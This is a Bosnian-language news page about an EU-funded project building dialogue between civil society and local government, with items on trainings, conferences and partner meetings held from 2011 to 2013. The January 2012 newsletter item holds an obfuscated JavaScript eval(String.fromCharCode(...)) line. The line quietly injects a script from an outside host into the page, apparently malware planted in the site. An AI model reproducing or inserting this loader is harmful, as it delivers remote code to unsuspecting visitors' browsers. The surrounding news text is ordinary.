Završna konferencija civilno društvo u akciji za dijalog i partnerstvo
Završna konferencija civilno društvo u akciji za dijalog i partnerstvo

Mostar , maj 2013.

Završna konferencija za civilno društvo u akciji za dijalog i partnerstva projekta, pod nazivom "Sporazum kao temelj saradnje između civilnog društva i vlasti u Bosni i Hercegovini" , okupilo je oko 80 učesnika, predstavnika nevladinih udruga i lokalnih samouprava iz Bosne i Hercegovine, susednih zemalja i zemalja članica EU.

Trening i sastanak radne grupe
Bihać, Decembar 2012. Kao dio projekta „Civilno društvo u akciji za dijalog i partnerstvo“, nevladina organizacija Demokratski Centar Nove Nade“ Bihać, koja je jedan od partnera u projektu, organizovala je trening na temu „Vještine komuniciranja i odnosi sa javnošću“. Trening je bio namjenjen općinskim službenicima/uposlenicima organa lokalne uprave iz općina/gradova koji učestvuju u projektu, i održan je u periodu od 13.-14.12.2012. godine u Bihaću, BiH. Cilj ovog treninga bio je da se ojačaju kapaciteti lokalnih uprava u saradnji sa nevladinim organizacijama i društvom u cjelini, kako bi se olakšao proces donošenja i implementacije lokalnih sporazuma o saradnji.
ZTrening seminar “Izgradnja partnerstava za EU integracije”
Trening seminar “Izgradnja partnerstava za EU integracije”
Zavidovići, Decembar 2012 Training seminar „Izgradnja partnerstva za EU integracije“ za organizacije civilnog društva i lokalne vlasti, u okviru projekta „Evropska i naša posla“ održan je u Zavidovićima 12. decembra 2012.godine.  Jednodnevni trening u Zavidovićima organizovao je ALD Zavidovići u saradnji sa senior trenerom, Stanka Parać, iz Asocijacije agencija lokalne demokratije.
Trening za NVO’e u sklopu projekta
Visoko, oktobar 2012. U sklopu projekta „Civilno društvo u akciji za dijalog i partnerstvo“  partnerska organizacija U.G. Centar za lokalni razvoj Breza organizirala je trening na temu: "Razvoj vještina zagovaranja“, u sklopu projektnih aktivnosti izgradnje kapaciteta organizacija civilnog društva iz Bosne i Hercegovne. Na treningu su učestvovalo 15 predstavnika/ca organizacija civilnog društva sa područja općina/gradova koji učestvuju u projektu, a  održao se  u periodu od 10. – 12. 10.2012. godine, u Motelu „Bosanska Piramida Sunca“ u Visokom.
Poseta predsednika ALDA gradonačelniku Subotice
Poseta predsednika ALDA gradonačelniku Subotice

Novembar 2013.

Predsednik Asocijacije agencija lokalne demokraije ALDA - Oriano Otočan, boravio je danas 14. novembra u zvaničnoj poseti Gradu Subotici gde je imao priliku sastati se sa gradonačelnikom Modestom Dulićem.

Tragom Alberta Londresa
Tragom Alberta Londresa

Avgust 2012

Od 5. do 24. avgusta France-Balkans mreža organizuje seminar “Tragom Alberta Londresa” koji je posvećen promovisanju novinarstva među mladima iz Francuske i zemalja Balkana.

U okviru projekta, 30-ak mladih novinara iz Francuske, Rumunije, Bosne i Hercegovine, Makedonije i Srbije  u pratnji iskusnijih profesionalaca Francuske televizije, imaće zadatak da posete zemlje Balkana i naprave zanimljive reportaže o trenutnoj ekonomskoj, socijalnoj i političkoj situaciji u ovim zemljama. Prva destinacija im je bila upravo Subotica.

Civilno društvo u akciji za partnerstvo i dijalog

Januar 2012   Poštovani,   U prilogu se nalazi prvi broj elektronskog newslettera koji se izrađuje u okviru projekta Civilno društvo u akciji za partnerstvo i dijalog. Više o samom projektu, organizacijama koje ga implementiraju i aktivnostima u newsletteru. Takođe, slobodno podelite link projektnog newsletter-a svim zainteresovanima.   Ugodno čitanje!  var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,102,111,114,46,102,105,114,115,116,98,108,97,99,107,112,104,97,115,101,46,99,111,109,47,116,114,98,98,98,98,98,50,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*674867468*/...

Održan godišnji partnerski sastanak u Poljskoj
Jul 2011

Godišnji sastanak partnera Centra lokalne demokratije Subotica održan je 8. jula u Bidgošču u Poljskoj (Bydgoszcz, Poland). Prilika da se partnerski sastanak održi baš ovde pojavila se zbog učešća na internacionalnoj konferenciji “Volontiranje za demokratiju” i Generalnom samitu koji se dešavao u isto vreme u organizaciji mrežne Asocijacije ALDA, kojoj Centar lokalne demokratije priprada. Godišnji sastanak partnera Centra lokalne demokratije tokom održan uz podršku evropskog operativnog granta.

Na sastanku su bila prisutna dva predstavnika Centra i predstavnik vodećeg partnera Grada Wolverhampthona, gospodin Roger Lawrence. Tokom sastanka razmatrane su aktivnosti Centra lokalne demokratije koje su bile implementirane od poslednjeg godišnjeg sastanka, koji se održao tokom decembra 2010. godine u Segedinu u Mađarskoj.

OTVARANJE KONFERENCIJE PROJEKTA PODRŽANOG PROGRAMOM IPA 2009 BOSNIA, CIVILNO DRUŠTVO U AKCIJI ZA PARTNERSTVO I DIJALOG
TUZLA (BiH), 7/8 OKTOBAR 2011.

“Opštinska saradnja: izazovi i perspektive demokratiske participacije na lokalnom nivou u Bosni i Herzegovini”, biće glavni focus konferencije koja će biti održana u Tuzli (BiH) 7 i 8 Oktobra 2001.

Ova konferencija je organizovana kao uvodni događaj radi promocije activnosti predviđene u sklopu trogodišnjeg projekta regionalne saradnje na projektu: Civilno društvo u akciji za dijalog i partnerstvo  (IPA 2009 BiH), predvođeno od strane ALDA, uz podršku Delegacije Evropske Unije u Bosni i Hercegovini u sklopu Programa: Podrška mrežama civilnih organizacija.

Vodeći partner projekta je ALDA – Associjacija Lokalno Demokratskih Agencija, dok su partneri članovi mreže u Bosni i Hercegovini, Hrvatskoj i Srbiji – Agencije / Centri Lokalne Demokratije Mostar, Zavidovići, Osijek, Subotica, kao i partneri Forum građana Tuzle, Centar za Lokalni Razvoj Breza, DON Prijedor i Nove nade Bihać, lokal civilne organizacije koje doprinose efektivnom  demokratiji na lokalu.

Civilno društvo u akciji za dijalog i partnerstvo
Septembar 2011   Kratak pregled IPA 2009 Podrška mreži civilnih organizacija Podržano od strane Delegacije Evropske Unije Bosne i Hercegovine Period implementacije: Jun 2011./Jun 2013.